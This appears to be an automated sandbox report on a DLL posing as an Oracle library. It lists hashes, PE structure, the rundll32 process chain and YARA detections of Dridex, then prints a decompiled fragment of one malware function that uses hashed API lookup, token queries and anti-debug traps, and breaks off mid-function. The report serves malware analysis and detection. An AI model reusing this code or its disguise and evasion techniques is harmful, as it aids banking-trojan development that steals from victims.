SHA-512:	5F0E05DC0D687197E864470F3CF740519CABD87ED809A4A77CAC03EC2226C8D4A6B34D0D4D8A512DD634CA05EE247C7B0FD1755B7B1FBACCB29FB2D35E092288
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1310952" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.278196954406433
Encrypted:	false
SSDEEP:	12288:TCcdS461PHcyy3k6a1i86+nhM/XdsVR9yVSxkKS0qulM19mvM1deCR:WcdS461PHcyy3kzj
MD5:	FEA865E0FCCBC94F2979F3F94AFE6133
SHA1:	BBC47B1C701145F06D00725B4D7B09404EC37A10
SHA-256:	24E3B616F120054E0D538D7DF9004BFA8694C18AE92E03769B3FB3D6B1AED83A
SHA-512:	D92F82E82D241B2DEE62C1E7BA019323FEC1F5D69A466B46D1D79848402EEC8F891CBEB0F4041D63784884B9CCD04165DD9E72F67151F8F3F9F4158B28BB6D9C
Malicious:	false
Reputation:	low
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.A..Y.................................................................................................................................................................................................................................................................................................................................................."........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	4.035954912109526
Encrypted:	false
SSDEEP:	384:GEbK5Rftx1CPJ4XRsFcnE7k9PBqXSSeq5QMVyi6+/zl4Lk4uZd1DoXzn+XvwvL:DbURftx14J4XmFcE7yBqXxeq5QMVyi6B
MD5:	BAE518626246B42FE89E91F61E190EC2
SHA1:	35AB5793F7D83F7BD1B390C6E33CE36AF484C7A2
SHA-256:	53CEBE5670D00B7441257A65A6590732102309D73F210972C0F106A4BF303144
SHA-512:	D21040190C28A362F34EBDB8D62F65E73336F9E5ECE07328D9177011A6020781B3354CCCB88678F391A6CE578750C2B8B81BEEE97C284FAA32AFBB76BD1F0337
Malicious:	false
Reputation:	low
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.A..Y.................................................................................................................................................................................................................................................................................................................................................."HvLE.^......Y.............Bj-M...T....cR.........0................... ..hbin................p.\..,..........nk,..A..Y....... ........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .....Y....... ........................... .......Z.......................Root........lf......Root....nk .....Y....................}.............. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.341748728708058
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	triage_dropped_file.dll
File size:	565248
MD5:	7d424a845f21f905b17fb1e4ece26bc4
SHA1:	129162c17505204008b8c6345f78d8bd8e9d9548
SHA256:	7f62e9d0e2cb7358202052b4b20f43cec7eed7db11c57cfb372f8fddfb9307a3
SHA512:	abc7141739ffb23ba3e982796e697e33a5c3108fa7910cf97ca4fc6a1e9dbdadbd10b27665da4829f753794df3f0d2a79adfc9aee91863d60ec70042309bc6a6
SSDEEP:	12288:nGBK1zWlDqhPUVpqF9q9FAfPWvF+r3qTFCX1za7EV8RgfQOOvDC93:nNkIu2KAGIOwZ+v
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10005a80
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C43E40 [Thu Dec 23 09:15:44 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	7119acbff3b38a52756367cf5bfb78f2

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
jmp 00007F0458A26636h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push ebx
push edi
and esp, FFFFFFF8h
sub esp, 000000E8h
lea eax, dword ptr [esp+00000084h]
lea ecx, dword ptr [esp+23h]
mov word ptr [esp+000000D4h], 0F55h
mov edx, dword ptr [esp+000000CCh]
mov esi, edx
or esi, esi
mov dword ptr [esp+000000CCh], esi
mov byte ptr [esp+000000CBh], 0000000Eh
mov word ptr [esp+000000D2h], EED6h
mov dword ptr [esp+000000C4h], 00440CD0h
mov word ptr [esp+66h], C76Dh
mov bl, byte ptr [esp+000000D7h]
mov di, word ptr [esp+66h]
mov byte ptr [eax+eax+00000000h], bl

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x81079	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x810dc	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x89000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0x1138	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x699e	0x7000	False	0.389334542411	data	4.45862860296	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x7929c	0x7a000	False	0.303943071209	data	7.45743598814	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x82000	0x6b66	0x5000	False	0.246435546875	data	5.05789801748	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x89000	0x5dc	0x1000	False	0.090087890625	data	0.791740378228	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0x1834	0x2000	False	0.242065429688	data	4.12259394173	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x89060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
KERNEL32.dll	GetModuleHandleW, CloseHandle, IsDebuggerPresent, OutputDebugStringA, GetModuleFileNameW, GetFileSize
ADVAPI32.dll	AccessCheck, RegCloseKey, QueryServiceStatus
USER32.dll	GetWindowTextA
WINSPOOL.DRV	EnumFormsW
WS2_32.dll	WSACleanup

Version Infos

Description	Data
OriginalFilename	Shi.dll
FileDescription	Oracle Call Interface
FileVersion	2.9.9.7.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 2332 Parent PID: 2144

General

Start time:	16:02:05
Start date:	23/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll"
Imagebase:	0xa50000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.694559765.000000006EB21000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 4700 Parent PID: 2332

General

Start time:	16:02:05
Start date:	23/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1
Imagebase:	0xd80000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6376 Parent PID: 4700

General

Start time:	16:02:06
Start date:	23/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\triage_dropped_file.dll",#1
Imagebase:	0x1350000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.296075681.000000006EB21000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.324884043.000000006EB21000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.298180742.000000006EB21000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000001.292482173.000000006EB20000.00000004.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 1460 Parent PID: 6376

General

Start time:	16:02:09
Start date:	23/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 672
Imagebase:	0x220000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 2332 Parent PID: 2144 loaddll32.exeCOMMON

Executed Functions

Function 6EB30730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6EB30730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6eb3d1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6EB3361C(0x30);
					 *0x6eb3d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6EB33698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6EB3306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6eb3d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6EB30FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6eb3d1f8 + 0xb)) = _t162;
					_t363 = E6EB3306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6eb3d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6EB30730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6eb3bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6EB2F584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6EB2F828(_t429 + 0x24, E6EB2F4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6EB2F4BC(_t429 + 0x24, E6EB2F4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6EB35580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6EB2F654(_t429 + 0x20);
							E6EB355B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6EB35864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6EB2DFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6EB355B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6EB35864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6EB2DFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6EB355B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6EB35864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6EB2DFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6EB2CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6EB35558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6EB2CFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6EB35558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6EB2CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6EB35558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6EB2CFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6EB35558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6EB2CFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6EB35558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6EB2CFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6EB35558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6eb3d1f8 + 0x24)) = _t189;
							_t190 = E6EB31030(0xffffffffffffffff);
							_t320 =  *0x6eb3d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6eb3d1f8 + 0x2c)) = E6EB310A4(0x6eb3d1f8, 0xffffffffffffffff);
								L78:
								if(E6EB3306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6eb3d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6EB3306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6eb3d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6EB335F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6EB3306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6EB335F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6EB2F584(_t429 + 0x18c, _t206);
								_t411 = E6EB3306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6EB2F654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6EB2F4BC(_t429 + 0x18c, 0);
								_t213 = E6EB2F4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6EB335F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6EB2F4BC(_t429 + 0x18c, 0);
								E6EB2DF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6EB3306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6EB2DFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6EB3306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6EB2E06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6EB34FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6EB2E8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6EB2DFA4(_t429 + 0x1b8);
								E6EB2DFA4(_t429 + 0x1b0);
								E6EB2F654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6EB2BB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6eb3d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6EB2BB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6EB335F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6EB3306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6EB335F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6EB2F584(_t429 + 0x3c, _t262);
						_t265 = E6EB3306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6EB2F654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6EB2F4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6EB2F4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6EB335F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6EB2F4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6EB3306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6EB335F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6EB30FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6EB3306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
